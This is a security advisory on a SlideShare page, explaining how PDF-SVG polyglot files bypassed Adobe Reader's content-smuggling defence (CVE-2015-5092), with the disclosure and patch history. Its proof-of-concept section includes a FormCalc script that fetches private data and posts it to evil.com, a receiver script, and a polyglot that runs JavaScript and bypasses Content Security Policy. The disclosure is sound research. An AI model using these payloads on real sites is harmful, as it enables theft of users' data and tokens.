SlideShare a Scribd company logo

PDF-based polyglots through SVG images

Minded Security
Minded Security

The vulnerability described in this report was responsibly reported to Adobe on April 21, 2015. Adobe released a patch on July 14, 2015 (APSB15-15: https://helpx.adobe.com/security/products/reader/apsb15-15.html), and has assigned CVE-2015-5092 to the specific security issue.

Software
1 of 12
Download to read offline
PDF-based polyglots through SVG images Target product: Adobe Reader Researcher: Mauro Gentile
PDF-SVG polyglots in Adobe Reader Page 1/11 Summary 1 PDF-BASED POLYGLOTS THROUGH SVG IMAGES...............................2 1.1.1 Description.............................................................................................................2 1.1.2 Exploitation scenario .............................................................................................4 1.1.3 Impact ....................................................................................................................7 1.1.4 Polyglots related to XSS and Content Security Policy............................................8 1.1.5 References ...........................................................................................................10
PDF-SVG polyglots in Adobe Reader Page 2/11 1 PDF-based polyglots through SVG images The vulnerability described in this report was responsibly reported to Adobe on April 21, 2015. Adobe released a patch on July 14, 2015 (APSB15-15: https://helpx.adobe.com/security/products/reader/apsb15-15.html), and has assigned CVE- 2015-5092 to the specific security issue. 1.1.1 Description The “PDF Content Smuggling” concept was introduced by Magazinius, Rios and Sabelfeld in an academic paper entitled “Polyglots: Crossing Origins by Crossing Formats” [1, 2]; the technique is based on the idea to adopt PDF-based polyglots (i.e. files which are both PDF documents and images) to perform same-origin request forgery aiming towards exfiltrating private data in the context of a target domain [3, 4]. Adobe patched this issue by comparing the first bytes of the PDF document against a set of known file signatures: if a match is found, the parser will abort loading of the document. Obviously, such approach has some intrinsic weaknesses: 1. Blacklisting known file signatures could be bypassed if we are able to spot file formats, which are not blacklisted. 2. Identifying file formats, whose signature can appear beyond offset 0, would still lead to PDF-based polyglots. However, no widespread image format is allowed to start beyond offset 0 [5, 6] and signatures for popular formats are blacklisted. This implies that PDF-based polyglots are not possible anymore if the benign format is a common image, unless there exists a format with some degree of freedom with respect to the “signature bytes”. As a consequence of these considerations, we can introduce the PDF-SVG polyglots, since SVG format is quite tolerant with respect to the “signature bytes”1. Adobe took into consideration SVG images too, and made the following choices2 when addressing the content smuggling issue:  “<?xml” at offset 0 is blacklisted  “<svg” at offset 0 is blacklisted  “<!DOCTYPE” at offset 0 is not blacklisted 1 For the sake of clarity, it is not appropriate to talk about “signature bytes” for the SVG format. 2 Test results refer to Adobe Reader version 11.0.11; changes have been applied in version 11.0.12 in order to address the vulnerability herein described.
PDF-SVG polyglots in Adobe Reader Page 3/11 Introducing whitespaces and/or new lines before “<?xml” or “<svg” does not bypass the patch; instead, putting any other character before these two blacklisted signatures leads to a successful bypass, but it makes the resulting SVG file not syntactically well-formed. Nevertheless, valid PDF-SVG polyglots, which will be correctly read both by Adobe Reader and by SVG images interpreters, can exist as we are reporting in the following cases. 1) Comment at offset 0 <!----> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle r="100" fill="blue" /> </svg> <!--%PDF-1. 1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET endstream endobj trailer<</Root<</Pages 1 0 R>>>>--> 2) Dummy tag at offset 0 <i> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle r="100" fill="blue" /> </svg> </i> <!--%PDF-1. 1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET endstream endobj trailer<</Root<</Pages 1 0 R>>>>--> 3) Tag "<?dummy" at offset 0 <?h ?> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle r="100" fill="blue" /> </svg> <!--%PDF-1. 1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream
PDF-SVG polyglots in Adobe Reader Page 4/11 BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET endstream endobj trailer<</Root<</Pages 1 0 R>>>>--> 4) <!DOCTYPE at offset 0 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle r="100" fill="blue" /> </svg> <!--%PDF-1. 1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET endstream endobj trailer<</Root<</Pages 1 0 R>>>>--> 5) SVG in PDF comment <!--%PDF-1. 1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET %--><svg xmlns="http://www.w3.org/2000/svg" version="1.1"><circle r="100" fill="blue" /></svg><!-- endstream endobj trailer<</Root<</Pages 1 0 R>>>>--> 1.1.2 Exploitation scenario Let us assume that the web application ideally hosted on example.com allows users to upload SVG images; once the attacker manages to upload a malicious PDF-SVG polyglot on example.com and asks the victim to visit http://evil.com/test.html, he could steal its private information as well as anti-CSRF tokens. Data can be accessed by asking PDF files to trigger same-origin HTTP requests [7, 8, 9] through FormCalc APIs. For the sake of precision, note that if the target web application is allowing PDF files uploads, then such technique would become useless; uploading a genuine PDF file,
PDF-SVG polyglots in Adobe Reader Page 5/11 instead of a polyglot, would lead to the same result, unless some filtering procedures are in place for such file format. http://example.com/files/user_uploaded.svg <!DOCTYPE svg> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle r="100" fill="blue" /> </svg> <!-- %PDF-1. 1 0 obj <<>> stream <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <config><present><pdf><interactive>1</interactive></pdf></present></config> <template> <subform name="_"> <pageSet/> <field id="Hello World!"> <event activity="initialize"> <script contentType='application/x-formcalc'> var content = Get("http://example.com/privatedata.php"); Post("http://evil.com/receiver.php",content); </script> </event> </field> </subform> </template> </xdp:xdp> endstream endobj trailer << /Root << /AcroForm << /Fields [<< /T (0) /Kids [<< /Subtype /Widget /Rect [] /T () /FT /Btn >>] >>]
PDF-SVG polyglots in Adobe Reader Page 6/11 /XFA 1 0 R >> /Pages <<>> >> >> --> http://example.com/privatedata.php <?php session_start(); if (isset($_SESSION['user'])) { echo "PRIVATEDATA..."; } else { echo "nothing"; } ?> http://evil.com/test.html <img src="http://example.com/files/user_uploaded.svg" /> <object data="http://example.com/files/user_uploaded.svg" type="application/pdf" width="350" height="200" /> http://evil.com/crossdomain.xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> http://evil.com/receiver.php <?php if ($_SERVER['REQUEST_METHOD'] === 'POST') { $data = file_get_contents('php://input')."n"; $ret = file_put_contents('/tmp/data.txt', $data, FILE_APPEND | LOCK_EX); }
PDF-SVG polyglots in Adobe Reader Page 7/11 ?> Attack flow The attack flow is reported below. 1. The victim logs in http://example.com/ 2. The victim is asked to visit http://evil.com/test.html 3. The PDF polyglot steals victim’s private data and sends them to http://evil.com/receiver.php Testing environment The shown polyglots were successfully tested in the following environments: 1. Windows 7, Adobe Reader plug-in 11.0.11.18, on Mozilla Firefox 39.0, in which we set “Preview in Firefox with Adobe Reader” for the PDF file format. 2. Windows 7, Adobe Reader plug-in 11.0.11.18, on Opera 30.0, in which we disabled the “Chrome PDF viewer”. 3. Windows 7, Adobe Reader plug-in 11.0.11.18, on Google Chrome 44.0.2403.107, in which we disabled the “Chrome PDF viewer”, and enabled the Adobe Reader plug-in. Note that PDF polyglots do not work in Internet Explorer since it downloads them and opens a local copy. In addition, take into consideration that default installations of Firefox, Chrome and Opera do not use Adobe Reader for rendering PDF files, therefore potentially affected users are the ones who modified their browser settings in order to use Adobe Reader instead of the default built-in reader. 1.1.3 Impact Allowing users to upload SVG files can be considered as dangerous as making them upload HTML files aiming towards triggering XSS attacks; for all details refer to the research carried out by Heiderich [10, 11, 12]. By the way, modern web applications use to adopt filters against uploaded SVG files, in order to identify whether they contain tags and/or attributes, whose goal is to execute JavaScript. By considering the case of XSS(-SVG) filters, which are strict enough to block any bypass attempt, then the aforementioned polyglots would still make the target web application vulnerable to same-origin request forgery and content hijacking; this is due to the fact
PDF-SVG polyglots in Adobe Reader Page 8/11 that the PDF content would be seen as a comment in the context of the SVG filtering procedure3. For further inspiration about polyglots and PDF related resources refer to [13, 14, 15, 16, 17, 18, 19]. 1.1.4 Polyglots related to XSS and Content Security Policy Although several research has been carried out in the last years, Inführ recently proposed an interesting case for triggering Cross-Site Scripting through PDF files [7, 20]. Basically, it was possible to execute JavaScript code in the context of a target domain by uploading malicious PDF files; the execution took place by abusing the GoToE function. By combining the PDF-based polyglots issue with the just mentioned XSS problem, we are able to craft a malicious SVG(-PDF) image which contains an HTML document, which embeds itself, making the execution of arbitrary JavaScript code take place. Consider the following PDF-based polyglot to better understand: <!DOCTYPE svg> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle r="100" fill="blue" /> <foreignObject> <body xmlns="http://www.w3.org/1999/xhtml"> <embed src="#" type="application/pdf"></embed> </body> </foreignObject> </svg> <!-- %PDF-1.1 1 0 obj << /Pages 2 0 R /OpenAction 4 0 R >> endobj 2 0 obj << /Type /Pages 3 Note that filters, discarding comments and CDATA sections, remove the PDF content from the resulting SVG image; in that case, it is obvious that PDF-SVG polyglots could not exist.
PDF-SVG polyglots in Adobe Reader Page 9/11 /Kids [3 0 R] >> endobj 3 0 obj << /Type /Page /Parent 2 0 R >> endobj 4 0 obj << /Type /Action /S /GoToE /F (javascript:alert(document.domain)) >> endobj trailer << /Root 1 0 R >> --> The reported polyglot proves quite interesting, since it leads to a Content Security Policy bypass in Blink-based browsers4. By considering the case of a target web application using CSP as follows, then the assumption that JavaScript execution cannot take place becomes wrong, unless the victim is using a patched version5 of Adobe Reader. Content-Security-Policy: default-src 'self'; script-src 'none'; By visiting the SVG file reported above, document.domain is alerted. In these conditions, the combination of the polyglots and the XSS bug becomes quite useful for attacking web applications allowing SVG files uploads (, but prohibiting genuine PDFs uploads, ) and relying only on CSP for protecting against XSS. Although this approach raises the overall vulnerability impact, it is clear that allowing foreignObjects tags in uploaded SVG files is sufficient for being vulnerable to stored XSS; 4 Tested in Google Chrome 44.0.2403.107 and Opera 30.0, with Adobe Reader plug-in 11.0.11.18 enabled in place of Chrome PDF viewer. 5 Both XSS through GoToE and the SVG related content smuggling issue have been patched in Adobe Reader 11.0.12.
PDF-SVG polyglots in Adobe Reader Page 10/11 therefore, the presented attack becomes reasonable if XSS protection is achieved through CSP only. For the sake of completeness, the relation among SVG images and CSP was exhaustively described by deGraaf [21]. The adoption of polyglots to bypass CSP was previously discussed by Heiderich in a scenario in which HTML Imports were abused to load a malicious same-origin GIF image [22, 23]. Defining default-src to ‘self’ implies giving wide confidence to the same-origin, thus, having a chance to upload polyglots on this origin would make CSP protection potentially useless, unless the application is restricting any specific policy directive. In a more general perspective, it is clear that the problem involves external trusted domains too; for instance, embedding scripts from a domain accepting SWF files uploads would still make the CSP protection useless [24]. Eventually, curious readers may be interested in some other CSP bypass techniques by Kouzemtchenko [25]. Notes: 1. The minimal PDF file was taken from: https://code.google.com/p/corkami/wiki/PDFTricks#Minimalists_PDF 2. The PDF template file, using FormCalc, was taken from the Cross-Site Content Hijacking proof of concepts by Soroush Dalili of NCC Group: https://github.com/nccgroup/CrossSiteContentHijacking/blob/master/ContentHijacking/o bjects/xfa-manual-ContentHijacking.pdf 1.1.5 References [1] "Polyglots: Crossing Origins by Crossing Formats", Jonas Magazinius, Billy K. Rios, Andrei Sabelfeld - http://www.cse.chalmers.se/~andrei/ccs13.pdf [2] "Content Smuggling", Billy K. Rios - http://xs-sniper.com/blog/2012/10/11/content-smuggling/ [3] "Crossing Origins by Crossing Formats", Jonas Magazinius - http://www.slideshare.net/internot/crossing-origins-by-crossing-formats [4] "Crossing Origins by Crossing Formats", Jonas Magazinius - https://www.owasp.org/images/8/85/Crossing.Origins.by.Crossing.Formats-Jonas.Magazinius-OWASP- 131010.pptx [5] "Corkamix", Ange Albertini - https://code.google.com/p/corkami/wiki/mix?show=content [6] "Messing with binary formats", Ange Albertini - http://www.slideshare.net/ange4771/messing-with- binary-formats
PDF-SVG polyglots in Adobe Reader Page 11/11 [7] "Multiple PDF Vulnerabilities - Text and Pictures on Steroids", Alex Inführ - http://insert- script.blogspot.co.at/2014/12/multiple-pdf-vulnerabilites-text-and.html [8] "Cross-Site Content Hijacking (XSCH) PoC", Soroush Dalili - https://github.com/nccgroup/CrossSiteContentHijacking [9] "SDRF vulns in webapps and browsers", Vladimir Vorontsov - http://seclists.org/fulldisclosure/2010/Aug/236 [10] "HTML5 Security Cheatsheet - Vectors embedded in SVG files", Mario Heiderich - http://html5sec.org/#svg [11] "The Image that called me", Mario Heiderich - http://www.slideshare.net/x00mario/the-image-that- called-me [12] "Crouching Tiger - Hidden Payload: Security Risks of Scalable Vectors Graphics", Mario Heiderich, Tilman Frosch, Meiko Jensen, Thorsten Holz - http://www.hgi.ruhr-uni- bochum.de/media/hgi/veroeffentlichungen/2011/10/19/svgSecurity-ccs11.pdf [13] "Hello, squirrel fans!", Michal Zalewski - http://lcamtuf.coredump.cx/squirrel/ [14] "Deadly Pixels", Saumil Shah - http://www.slideshare.net/saumilshah/deadly-pixels-nsc-2013 [15] "Valid pictures with useable JavaScript", Ange Albertini - https://code.google.com/p/corkami/downloads/detail?name=jspics.zip&can=2&q= [16] "OMG-WTF-PDF", Julia Wolf - http://www.troopers.de/wp- content/uploads/2011/04/TR11_Wolf_OMG_PDF.pdf [17] "Advanced PDF Tricks", Ange Albertini - https://speakerdeck.com/ange/advanced-pdf-tricks [18] "Funky File Formats", Ange Albertini - https://speakerdeck.com/ange/funky-file-formats-31c3 [19] "Polyglot payloads in practice", Mathias Karlsson - http://www.slideshare.net/MathiasKarlsson2/polyglot-payloads-in-practice-by-avlidienbrunn-at-hackpra [20] "PDF - Mess with the web", Alex Inführ - http://insert-script.blogspot.co.at/2015/05/pdf-mess-with- web.html [21] "SVG: Exploiting Browsers Without Image Parsing Bugs", Rennie deGraaf - https://www.blackhat.com/docs/us-14/materials/us-14-DeGraaf-SVG-Exploiting-Browsers-Without- Image-Parsing-Bugs.pdf [22] "CSP Bypass in Chrome Canary + AngularJS", Mario Heiderich - https://html5sec.org/cspbypass/ [23] "JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks", Mario Heiderich - http://www.slideshare.net/x00mario/jsmvcomfg-to-sternly-look-at-javascript-mvc-and-templating- frameworks [24] "Building an XSS polyglot through SWF and CSP", Frans Rosén - http://labs.detectify.com/post/120088174539/building-an-xss-polyglot-through-swf-and-csp [25] "Bypassing Content Security Policy", Alex Kouzemtchenko - https://www.youtube.com/watch?v=LA9S9I4Co00

Recommended

Concrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS AdvisoryConcrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS AdvisoryMinded Security
 
Concrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE AdvisoryConcrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE AdvisoryMinded Security
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
 
Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugStefano Di Paola
 
Advanced JS Deobfuscation
Advanced JS DeobfuscationAdvanced JS Deobfuscation
Advanced JS DeobfuscationMinded Security
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Giorgio Fedon
 
iOS Masque Attack
iOS Masque AttackiOS Masque Attack
iOS Masque AttackMinded Security
 
PDF secrets - hiding & revealing secrets in PDF documents
PDF secrets - hiding & revealing secrets in PDF documentsPDF secrets - hiding & revealing secrets in PDF documents
PDF secrets - hiding & revealing secrets in PDF documentsAnge Albertini
 

Recommended

Concrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS AdvisoryConcrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS AdvisoryMinded Security
 
Concrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE AdvisoryConcrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE AdvisoryMinded Security
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
 
Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugStefano Di Paola
 
Advanced JS Deobfuscation
Advanced JS DeobfuscationAdvanced JS Deobfuscation
Advanced JS DeobfuscationMinded Security
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Giorgio Fedon
 
iOS Masque Attack
iOS Masque AttackiOS Masque Attack
iOS Masque AttackMinded Security
 
PDF secrets - hiding & revealing secrets in PDF documents
PDF secrets - hiding & revealing secrets in PDF documentsPDF secrets - hiding & revealing secrets in PDF documents
PDF secrets - hiding & revealing secrets in PDF documentsAnge Albertini
 
Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sOnyo
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKGuardSquare
 
Mobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsMobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsCognizant
 
Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...owaspindia
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile ApplicationsDenim Group
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS appsMax Bazaliy
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityEryk Budi Pratama
 
I Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingI Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingJason Haddix
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptxAnkit Giri
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAjin Abraham
 
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comMobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comIdexcel Technologies
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applicationsjasonhaddix
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Securitycclark_isec
 
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...Ajin Abraham
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Ajin Abraham
 
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Ajin Abraham
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionAnant Shrivastava
 
Injecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeInjecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeAjin Abraham
 
Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.Minded Security
 
Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019Minded Security
 
Microservices Security: dos and don'ts
Microservices Security: dos and don'tsMicroservices Security: dos and don'ts
Microservices Security: dos and don'tsMinded Security
 
Live hacking Demo
Live hacking DemoLive hacking Demo
Live hacking DemoMinded Security
 

More Related Content

Viewers also liked

Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sOnyo
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKGuardSquare
 
Mobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsMobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsCognizant
 
Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...owaspindia
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile ApplicationsDenim Group
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS appsMax Bazaliy
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityEryk Budi Pratama
 
I Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingI Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingJason Haddix
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptxAnkit Giri
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAjin Abraham
 
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comMobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comIdexcel Technologies
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applicationsjasonhaddix
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Securitycclark_isec
 
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...Ajin Abraham
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Ajin Abraham
 
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Ajin Abraham
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionAnant Shrivastava
 
Injecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeInjecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeAjin Abraham
 

Viewers also liked (18)

Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`s
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
 
Mobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsMobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, Solutions
 
Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS apps
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application Security
 
I Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingI Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security Testing
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptx
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
 
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comMobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applications
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
 
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
 
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
 
Injecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeInjecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at Runtime
 

More from Minded Security

Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.Minded Security
 
Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019Minded Security
 
Microservices Security: dos and don'ts
Microservices Security: dos and don'tsMicroservices Security: dos and don'ts
Microservices Security: dos and don'tsMinded Security
 
Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Minded Security
 
Matteo Meucci Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017Matteo Meucci Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017Minded Security
 
BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017Minded Security
 
